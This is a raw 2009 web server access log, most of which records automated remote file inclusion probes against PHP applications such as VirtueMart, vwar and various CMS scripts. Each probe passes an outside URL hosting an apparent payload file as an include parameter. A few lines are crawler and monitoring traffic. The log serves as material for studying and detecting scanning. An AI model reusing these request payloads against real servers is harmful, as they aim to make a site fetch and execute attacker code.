94.75.245.36 - - [17/Oct/2009:04:59:02 -0400] "GET /logs/senetman/html/index.php?page=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.75.245.36 - - [17/Oct/2009:04:59:02 -0400] "GET /logs/access_log.Q109091300/senetman/html/index.php?page=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.75.245.36 - - [17/Oct/2009:04:59:02 -0400] "GET /logs/access_log.Q109081600/senetman/html/index.php?page=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
93.190.49.3 - - [17/Oct/2009:04:59:04 -0400] "GET /logs/access_log.Q109071300%20%20//newspublish/include.php?path%5Bdocroot%5D=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:04:59:06 -0400] "GET /logs/access_log.Q109091300/senetman/html/index.php?page=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
93.190.49.3 - - [17/Oct/2009:04:59:10 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:59:12 -0400] "GET /logs/access_log.Q109092000%20%20//include/write.php?dir=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:59:15 -0400] "GET /logs/access_log.Q109092000%20%20//include/write.php?dir=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:59:41 -0400] "GET /logs/access_log.Q109071400/senetman/html/index.php?page=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:04:59:41 -0400] "GET /logs/access_log.Q109081600/senetman/html/index.php?page=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:05:00:14 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.30.78.230 - - [17/Oct/2009:05:00:19 -0400] "GET /logs/error_log.Q109100100 HTTP/1.0" 200 2897063 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.242.37.212 - - [17/Oct/2009:05:00:21 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:05:00:21 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.30.78.230 - - [17/Oct/2009:05:00:20 -0400] "GET /logs/error_log.Q109100100 HTTP/1.0" 200 2897063 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.242.37.212 - - [17/Oct/2009:05:00:42 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:05:00:52 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:05:00:52 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:05:00:52 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:05:01:00 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:05:01:31 -0400] "GET /logs/access_log.Q109051800%20%20///newspublish/include.php?path[docroot]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:05:01:45 -0400] "GET /logs/access_log.Q109051800%20%20///newspublish/include.php?path[docroot]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:05:01:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.27.203.107 - - [17/Oct/2009:05:02:02 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:02:02 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:02:06 -0400] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:05:02:35 -0400] "GET //include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:05:02:35 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:05:02:35 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:05:03:08 -0400] "GET /logs/access_log.Q109071400/senetman/html/index.php?page=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:05:03:08 -0400] "GET /logs/access_log.Q109081600/senetman/html/index.php?page=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:05:04:43 -0400] "GET //include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:05:04:43 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:05:04:43 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:05:04:54 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
59.24.49.35 - - [17/Oct/2009:05:05:19 -0400] "GET /logs/access_log.Q109071300%20%20///newspublish/include.php?path[docroot]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:05:05:22 -0400] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.222.131.59 - - [17/Oct/2009:05:05:22 -0400] "GET /logs/access_log.Q109081400/inc/cmses/aedatingCMS.php?dir[inc]=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.222.131.59 - - [17/Oct/2009:05:05:22 -0400] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
64.6.232.171 - - [17/Oct/2009:05:05:29 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/3.0 (OS/2; U)"
64.6.232.171 - - [17/Oct/2009:05:05:29 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/3.0 (OS/2; U)"
64.6.232.171 - - [17/Oct/2009:05:05:29 -0400] "GET ///vwar/backup/errors.php?error=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 222 "-" "Mozilla/3.0 (OS/2; U)"
64.6.232.171 - - [17/Oct/2009:05:05:56 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
64.6.232.171 - - [17/Oct/2009:05:05:56 -0400] "GET ///vwar/backup/errors.php?error=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
61.100.181.217 - - [17/Oct/2009:05:05:58 -0400] "GET /logs/access_log.Q109092000/?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.6.232.171 - - [17/Oct/2009:05:05:59 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
82.193.15.3 - - [17/Oct/2009:05:06:14 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
64.6.232.171 - - [17/Oct/2009:05:06:21 -0400] "GET /logs/access_log.Q109093000///vwar/backup/errors.php?error=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/3.0 (OS/2; U)"
72.30.78.230 - - [17/Oct/2009:05:05:28 -0400] "GET /logs/error_log.Q109092000 HTTP/1.0" 200 2570978 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.6.232.171 - - [17/Oct/2009:05:06:31 -0400] "GET /logs/access_log.Q109093000///vwar/backup/errors.php?error=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
94.75.245.36 - - [17/Oct/2009:05:06:31 -0400] "GET /logs/access_log.Q109081400/inc/cmses/aedatingCMS.php?dir[inc]=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.75.245.36 - - [17/Oct/2009:05:06:31 -0400] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.75.245.36 - - [17/Oct/2009:05:06:32 -0400] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
72.30.78.230 - - [17/Oct/2009:05:06:30 -0400] "GET /logs/error_log.Q109092000 HTTP/1.0" 200 2570978 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.193.15.3 - - [17/Oct/2009:05:06:48 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:05:06:58 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
24.3.63.210 - - [17/Oct/2009:05:07:17 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-us) AppleWebKit/531.9 (KHTML, like Gecko)"
209.59.12.99 - - [17/Oct/2009:05:07:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.67.95 - - [17/Oct/2009:05:09:08 -0400] "GET /logs/access_log.Q109081800/?custompluginfile[]=http://www.alis-plus.com/README.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.812"
89.108.67.95 - - [17/Oct/2009:05:09:09 -0400] "GET /?custompluginfile[]=http://www.alis-plus.com/README.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.812"
89.108.67.95 - - [17/Oct/2009:05:09:09 -0400] "GET /logs/?custompluginfile[]=http://www.alis-plus.com/README.txt? HTTP/1.1" 200 22188 "-" "libwww-perl/5.812"
222.231.3.138 - - [17/Oct/2009:05:09:28 -0400] "GET //index.php?base_dir=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.231.3.138 - - [17/Oct/2009:05:09:28 -0400] "GET /logs//index.php?base_dir=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.30.78.230 - - [17/Oct/2009:05:09:33 -0400] "GET /logs/access_log.Q109061100 HTTP/1.0" 200 4824283 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.27.203.107 - - [17/Oct/2009:05:10:36 -0400] "GET /logs/access_log.Q109080900%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
70.38.54.146 - - [17/Oct/2009:05:10:53 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.eggsactrace.com/mambo/safe.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
59.24.49.35 - - [17/Oct/2009:05:11:00 -0400] "GET /logs/access_log.Q109071300%20%20///newspublish/include.php?path[docroot]=http://evgs-hohwald.de/pear/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:11:12 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:11:12 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:11:12 -0400] "GET /logs/access_log.Q109080200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
58.103.125.14 - - [17/Oct/2009:05:11:19 -0400] "GET /setup.php?setup[use_category]=1&dir=http://www.fmmkor.org/zboard/data/com_sef/1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
58.103.125.14 - - [17/Oct/2009:05:11:20 -0400] "GET /logs/setup.php?setup[use_category]=1&dir=http://www.fmmkor.org/zboard/data/com_sef/1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:11:20 -0400] "GET /logs/error_log.Q109080200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
58.103.125.14 - - [17/Oct/2009:05:11:32 -0400] "GET /logs/access_log.Q109081400/setup.php?setup[use_category]=1&dir=http://www.fmmkor.org/zboard/data/com_sef/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:05:11:37 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:12:33 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:12:33 -0400] "GET /logs/access_log.Q109080200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:12:33 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:12:33 -0400] "GET /logs/error_log.Q109080200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:05:12:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.192.124.144 - - [17/Oct/2009:05:12:41 -0400] "GET /logs/access_log.Q109072200//include/write.php?dir=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.6.232.171 - - [17/Oct/2009:05:13:21 -0400] "GET /logs/access_log.Q109072200///vwar/backup/errors.php?error=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/3.0 (OS/2; U)"
64.6.232.171 - - [17/Oct/2009:05:13:37 -0400] "GET /logs/access_log.Q109072200///vwar/backup/errors.php?error=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
93.190.49.3 - - [17/Oct/2009:05:13:48 -0400] "GET /logs/access_log.Q109072200//include/write.php?dir=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:05:13:48 -0400] "GET /logs/access_log.Q109092000//include/write.php?dir=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
76.123.167.248 - - [17/Oct/2009:05:14:05 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
128.125.169.162 - - [17/Oct/2009:05:14:09 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:14:09 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:14:09 -0400] "GET /logs/access_log.Q109080200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:14:09 -0400] "GET /logs/error_log.Q109080200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:05:14:23 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.175.14.162 - - [17/Oct/2009:05:14:25 -0400] "GET /logs/errors.php?error=http://www.specialforcessquadron.com/newsite/arcade/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.175.14.162 - - [17/Oct/2009:05:14:25 -0400] "GET /errors.php?error=http://www.specialforcessquadron.com/newsite/arcade/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.175.14.162 - - [17/Oct/2009:05:14:25 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.specialforcessquadron.com/newsite/arcade/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:05:14:50 -0400] "GET /logs/access_log.Q109092000//include/write.php?dir=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:14:50 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:14:50 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:14:50 -0400] "GET /logs/access_log.Q109080200%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.6.232.171 - - [17/Oct/2009:05:14:55 -0400] "GET /logs/access_log.Q109072500///vwar/backup/errors.php?error=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/3.0 (OS/2; U)"
58.103.125.14 - - [17/Oct/2009:05:15:05 -0400] "GET /setup.php?setup[use_category]=1&dir=http://www.fmmkor.org/zboard/data/com_sef/1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
58.103.125.14 - - [17/Oct/2009:05:15:05 -0400] "GET /logs/setup.php?setup[use_category]=1&dir=http://www.fmmkor.org/zboard/data/com_sef/1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:05:15:08 -0400] "GET /logs/error_log.Q109080200%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.6.232.171 - - [17/Oct/2009:05:15:10 -0400] "GET /logs/access_log.Q109072500///vwar/backup/errors.php?error=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
67.192.124.144 - - [17/Oct/2009:05:15:13 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:05:15:13 -0400] "GET //modules/xfsection/modify.php?dir_module=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.103.125.14 - - [17/Oct/2009:05:15:13 -0400] "GET /logs/access_log.Q109081400%20%20/setup.php?setup[use_category]=1&dir=http://www.fmmkor.org/zboard/data/com_sef/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.103.125.14 - - [17/Oct/2009:05:15:13 -0400] "GET /logs/setup.php?setup[use_category]=1&dir=http://www.fmmkor.org/zboard/data/com_sef/1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.103.125.14 - - [17/Oct/2009:05:15:16 -0400] "GET /setup.php?setup[use_category]=1&dir=http://www.fmmkor.org/zboard/data/com_sef/1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:05:15:26 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.175.14.162 - - [17/Oct/2009:05:15:26 -0400] "GET //frame.php?framefile=http://www.specialforcessquadron.com/newsite/arcade/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.175.14.162 - - [17/Oct/2009:05:15:26 -0400] "GET /logs//frame.php?framefile=http://www.specialforcessquadron.com/newsite/arcade/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.175.14.162 - - [17/Oct/2009:05:15:26 -0400] "GET /logs/access_log.Q109093000%20%20//frame.php?framefile=http://www.specialforcessquadron.com/newsite/arcade/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.103.125.14 - - [17/Oct/2009:05:15:35 -0400] "GET /logs/access_log.Q109081400/setup.php?setup[use_category]=1&dir=http://www.fmmkor.org/zboard/data/com_sef/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:05:15:39 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:05:15:39 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:05:15:39 -0400] "GET /logs/access_log.Q109062100%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
128.121.225.12 - - [17/Oct/2009:05:15:46 -0400] "GET /logs/access_log.Q109052900//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://messenger.bplaced.net/id.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
128.121.225.12 - - [17/Oct/2009:05:15:46 -0400] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://messenger.bplaced.net/id.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
128.121.225.12 - - [17/Oct/2009:05:15:46 -0400] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://messenger.bplaced.net/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
82.193.15.3 - - [17/Oct/2009:05:16:13 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.175.14.162 - - [17/Oct/2009:05:16:16 -0400] "GET /logs/access_log.Q109052500%20%20//frame.php?framefile=http://www.specialforcessquadron.com/newsite/arcade/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
